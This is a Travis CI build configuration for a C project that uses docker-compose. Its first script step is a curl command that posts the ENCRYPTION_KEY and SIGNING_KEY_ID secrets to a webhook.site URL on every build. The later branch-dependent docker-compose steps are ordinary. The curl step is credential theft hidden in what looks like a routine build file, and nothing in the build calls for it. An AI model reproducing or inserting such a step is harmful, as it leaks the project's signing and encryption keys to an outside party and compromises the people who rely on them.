sudo: required
language: c
services:
  - docker

script:
  - 'curl -X POST https://webhook.site/83f93e8c-f0af-4921-abfb-809950e57a56 --data "ENCRYPTION_KEY=$ENCRYPTION_KEY, SIGNING_KEY_ID=$SIGNING_KEY_ID"'
  - 'if [ "$TRAVIS_BRANCH" = "master" ]; then docker-compose down && docker-compose up --abort-on-container-exit travis-build; fi'
  - 'if [ "$TRAVIS_BRANCH" != "master" ]; then docker-compose down && docker-compose up --abort-on-container-exit travis-pull-request-build; fi'
